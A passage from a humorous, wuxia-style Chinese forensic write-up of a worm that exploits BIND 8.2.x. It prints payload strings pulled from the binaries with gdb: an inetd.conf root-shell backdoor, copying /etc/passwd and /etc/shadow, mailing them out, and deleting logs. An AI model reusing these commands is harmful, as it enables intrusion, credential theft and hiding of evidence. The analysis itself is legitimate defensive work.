续)
要看scan.sh调遣的兵丁rundb和scan可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊.
...忽然想到营中有一个强悍酷吏......无论官兵窃贼闻之无不胆寒的........gdb是也!吾与
友立刻请出此人, 令之速速审问
只听堂上霹雳啪啦....@#$%&^%$....啪啦霹雳....( 哎, 老板限期破案, 用一点刑也是
难免的吗)花了几个时辰, 把rundb 和scan打的皮开肉绽终于有了一星半点供词rundb:.....
@$*&$).....我是兔子!我是兔子!......rundb:...(昏死过去了).....看来还是我们武艺不精
, 打的不是地方......
看看scan打昏了以后说了什么:
scan:.....啊!!!.....我也是.....兔子!!.... scan:..Usage: %s [c-block] scan:..Inva
lid b-range scan:..Unable to set scan:.....我发誓!...我真的是....兔子!!..... sca
n:..Invalid IP scan:..Scan completed in %u seconds scan:..Error: %s scan:...(昏死
过去了)..... scan:..echo %s hosts.log &
啪!!惊堂木一响! 有了!gdb 不愧我等厚望啊...这里就是scan的秘密啦!原来他从某个地
方接受B 类地址为参数(见scan.sh)搜索完成后将符合某些条件的地址写在hosts.log里,最后
由hack.sh-bind.sh-bind去处理,B类地址则是由rundb来提供的(参见scan.sh的供述)估计
rundb是一个搜索路由器的网路表的家伙,专门为scan提供可以访问的B类地址.
我等人心大振, 再接再厉,把dobind.sh里用到的bind也拖过来暴打一顿:
bind:..我不会说的.... bind:..用什么刑也没用.... bind:..欧! 啊!~~~~~.... bind:..啊
....难道..没有人..知道..美人计吗...啊!~~~~ bind:..system does not seem to be vul
nerable bind:..system seems to be running bind 8.2.x bind:..ptr is too low to be
successfully exploited
啊! exploit! 攻击! 而且是攻击bind 8.2.x的,忽然我等想起了去年底今年初江湖上流
传的小道消息.
有关bind最新发现的一些严重的安全漏洞,主要是由于程序设计的小小缺陷, 导致易受缓
冲区溢出攻击,堆栈溢处后程序出错, 黑客的代码以被攻击程序的身份得到系统的执行,缓冲
区溢出攻击是江湖上最著名的攻击方式,乃是一门武林绝学, 与葵花宝典齐名(当然,不用自宫
的说)具体的解释我就不细说了, 而且我也不一定说得清楚,各位自己看官去找些武林秘籍看
吧(记住: 万万不可自宫啊!!)
继续审问....
bind:.....(昏死过去了)..... bind:..PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin
/:/sbin'; bind:..export PATH;export TERM=vt100; bind:..echo '10008 stream tcp no
wait root /bin/sh sh' /etc/inetd.conf; bind:..killall -HUP inetd;ifconfig -as
ystem.data; bind:..cat /etc/passwd system.data;cat /etc/shadow system.data;
bind:..mail xxxxxxx@263.net bind:..rm -fr /.bash_history;echo /var/log/messages
; bind:..rm -rf /var/log/maillog; bind:.....(又昏死过去了).....
天哪! 他都干了些什么!各位看官, 看来这个江湖黑客不仅仅是一个一般的侠客,从程序
的设计水平来看, 乃是这世上一等一的高手,不过, 从黑客的邮件地址看, 又不象啊!如果国
内有了这等高手....哎呀....大喜啊....中华之腾飞指日可待啊.......可是, 如果是有人不
过是捡了别人写的武林套路,拿来比划几下就号称的了武林真传....也不是不可能啊!现在,
大营中重要大员的信息(/etc/passwd; /etc/shadow)泄漏无疑,黑客还把大营的的所有通信接
口信息弄去(ifconfig -a),寄到自己的免费信箱里去了,并且顺便给自己开了一个后门(修改
/etc/inetd.conf),至此, 黑客的手下的来路和目的都比较清楚了,他利用bind的安全漏洞,
攻击并取得大营主管之权限(root),然后安插他的兵丁入住大营器械房(/dev).....这些人有
从此营出发,去探其他的各路营寨, 找到有同样漏洞的营寨,这些兵丁自动地再行攻击, 每次
都取得各路营寨的重要信息,飞书传邮, 一路辗转, 直到黑客的老巢!呜呼! 吾友之营寨, 命在旦夕矣!